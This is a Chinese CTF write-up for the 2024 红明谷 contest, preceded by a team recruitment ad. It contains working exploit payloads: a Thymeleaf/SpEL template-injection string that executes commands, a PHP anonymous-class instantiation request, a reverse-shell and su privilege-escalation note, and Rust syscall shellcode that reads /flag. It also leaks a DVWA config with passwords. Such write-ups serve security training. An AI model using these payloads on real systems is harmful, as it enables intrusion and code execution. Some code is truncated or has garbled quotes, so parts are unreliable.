招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱
[email protected](带上简历和想加入的小组
Web
unauth
<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="Restricted Area"');
header('HTTP/1.0 401 Unauthorized');
echo '小明是运维工程师,最近网站老是出现bug。';
exit;
} else {
$validUser = 'admin';
$validPass = '2e525e29e465f45d8d7c56319fe73036';if ($_SERVER[‘PHP_AUTH_USER’] != $validUser || $_SERVER[‘PHP_AUTH_PW’] != $validPass) {
header(‘WWW-Authenticate: Basic realm=”Restricted Area”‘);
header(‘HTTP/1.0 401 Unauthorized’);
echo ‘Invalid credentials’;
exit;
}
}
@eval($_GET[‘cmd’]);
highlight_file(__FILE__);
?>
根目录flag,需要提权
Array ( [0] => . [1] => .. [2] => config.inc.php [3] => index.php [4] => www.zip )
<!--?php# If you are having problems connecting to the MySQL database and all of the variables below are correct
# try changing the ‘db_server’ variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
# Thanks to @digininja for the fix.
# Database management system to use
$DBMS = ‘MySQL’;
#$DBMS = ‘PGSQL’; // Currently disabled
# Database variables
# WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.
# Please use a database dedicated to DVWA.
#
# If you are using MariaDB then you cannot use root, you must use create a dedicated DVWA user.
# See README.md for more information on this.
$_DVWA = array();
$_DVWA[ ‘db_server’ ] = ‘127.0.0.1’;
$_DVWA[ ‘db_database’ ] = ‘dvwa’;
$_DVWA[ ‘db_user’ ] = ‘root’;
$_DVWA[ ‘db_password’ ] = ‘b90e0086d8b1165403de6974c4167165’;
# Only used with PostgreSQL/PGSQL database selection.
$_DVWA[ ‘db_port ‘] = ‘5432’;
# ReCAPTCHA settings
# Used for the ‘Insecure CAPTCHA’ module
# You’ll need to generate your own keys at: https://www.google.com/recaptcha/admin
$_DVWA[ ‘recaptcha_public_key’ ] = ‘6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ’;
# Default security level
# Default value for the secuirty level with each session.
# The default is ‘impossible’. You may wish to set this to either ‘low’, ‘medium’, ‘high’ or impossible’.
$_DVWA[ ‘default_security_level’ ] = ‘impossible’;
# Default PHPIDS status
# PHPIDS status with each session.
# The default is ‘disabled’. You can set this to be either ‘enabled’ or ‘disabled’.
$_DVWA[ ‘default_phpids_level’ ] = ‘disabled’;
# Verbose PHPIDS messages
# Enabling this will show why the WAF blocked the request on the blocked request.
# The default is ‘disabled’. You can set this to be either ‘true’ or ‘false’.
$_DVWA[ ‘default_phpids_verbose’ ] = ‘false’;
?–>
pcntl_exec反弹shell,su用读到的密码提权即可
easyescape-赛后复现
设置了ttl=0,并且解析到实际发起请求有4s的间隔。
还以为是DNS rebinding,但实测不行,今天看了看确实是两次请求,存在DNS重绑定攻击的可能,但本地还是远程都打不通。利用302跳转可以绕过。
[图片] 内网就是个Thymeleaf SSTI,又出网,直接弹shell。
Context context = new Context();
SpringTemplateEngine engine = new SpringTemplateEngine();
return engine.process(hostname, (IContext)context);
hostname填这个:
[[${T(java.lang.Boolean).forName("com.fasterxml.jackson.databind.ObjectMapper").newInstance().readValue("{}",T(java.lang.Boolean).forName("org.springframework.expression.spel.standard.SpelExpressionParser")).parseExpression("T(Runtime).getRuntime().exec('calc')").getValue()}]]
ezphp
https://github.com/synacktiv/php_filter_chains_oracle_exploit
Error based oracle测信道攻击
工具有几率跑出来部分内容,如下传参后有个highlight
/flag.php?ezphpPhp8=ko1sh1
<?php
if (isset($_GET['ezphpPhp8'])) {
highlight_file(__FILE__);
} else {
die("No");
}
$a = new class {
function __construct()
{
}function getflag()
{
system(‘cat /flag’);
}
};
unset($a);
$a = $_GET[‘ezphpPhp8’];
$f = new $a();
$f->getflag();
?>不懂这个unset有什么意义,通过get_class打印类名,注意有一个空字符。
class@anonymous%00/var/www/html/flag.php:8$0
GET /flag.php?ezphpPhp8=class@anonymous%00/var/www/html/flag.php:7$0 HTTP/1.1
Host: eci-2zef6aoe4x8c78fobzdc.cloudeci1.ichunqiu.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1711431296,1711937711,1712027510
playground
ban了std的情况下写rust程序去执行
orw获取flag,可以写内联汇编来搞syscall(rust的orw shellcode)
fn main() {
let mut buf = [0u8; 1024];
let filename = "/flag\0";
let fd: i32;
let count: usize;
unsafe {
// open 系统调用
core::arch::asm!(
"syscall",
in("rax") 2, // sys_open
in("rdi") filename.as_ptr(),
in("rsi") 0, // flags (O_RDONLY)
lateout("rax") fd,
);
// 检查文件描述符是否有效
if fd >= 0 {
// read 系统调用
core::arch::asm!(
"syscall",
in("rax") 0, // sys_read
in("rdi") fd,
in("rsi") buf.as_mut_ptr(),
in("rdx") buf.len(),
lateout("rax") count,
);
// write 系统调用,将读取的内容写到标准输出
core::arch::asm!(
"syscall",
in("rax") 1, // sys_write
in("rdi") 1, //
in("rsi") buf.as_ptr(),
in("rdx") count,
);
}
}
}
Crypto
CDMA-赛后复现
给出的signal数据存在高斯噪声,先降噪,求平均值即可
然后整个算法可以看作是
但是这个也不是正正好就是模2的矩阵乘法,向量内积的时候元素加元素是异或(模2加),但是最后做加法的时候又是单纯求和 不过 0,1的异或算法,和 1,-1的乘法运算可以一一对应,
因此上面的运算也可以映射成矩阵乘法,(正负好像得反一下)
得到 chips 后
根据 cdma 的转换后的正交特性
于是我们计算
即可得到
这样子flag就由列向量变成行向量了。不过因为这里使用的 1 和 -1,题目的基是 0 和 1,所以结果并不是32的倍数,不过根据实践结果来看,也不复杂,只有两种可能。
with open("output.pkl", "rb") as file:
signal = pickle.load(file)
single_signal_list = []
signals = []
signals_col = []
for i in range(0,len(signal)//1997):
single_signal_list = signal[i*1997:(i+1)*1997]
single_signal = round((sum(single_signal_list)/1997)*10)
signals.append(single_signal)
if len(signals) == 32:
signals_col.append(signals)
signals = []
signals_matrix = matrix(ZZ,signals_col)
chips = signals_matrix.LLL()[-11:-1]
M_T = chips * signals_matrix.T
for m in M_T:
tag = m[0]
flag=''.join(['0' if i == tag else '1' for i in m])
print(int.to_bytes(int(flag,2),48,'
Misc
定位签到
别用谷歌~用bing
– END –
原文始发于微信公众号(ChaMd5安全团队):2024第四届红明谷 WriteUp By Mini-Venom
